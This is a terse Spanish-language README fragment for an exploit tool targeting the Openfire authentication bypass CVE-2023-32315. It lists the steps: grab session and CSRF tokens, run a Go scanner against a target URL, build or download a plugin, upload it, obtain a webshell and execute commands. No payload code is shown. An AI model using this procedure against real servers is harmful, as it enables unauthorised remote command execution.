
rce
0x01 Obtén el JSESSIONID y csrftoken devueltos, construye el paquete de solicitud para agregar un usuario (reemplaza JSESSIONID y csrftoken)

cd CVE-2023-32315-Openfire-Bypass/scan_all
go mod tidy
go run main.go -u http://openfire.com:9090
0x02 Compilación e instalación del plugin
mvn clean package
o descarga el plugin desde releases
0x03 Sube el plugin

0x04 Obtén la webshell
0x05 Ejecuta comandos
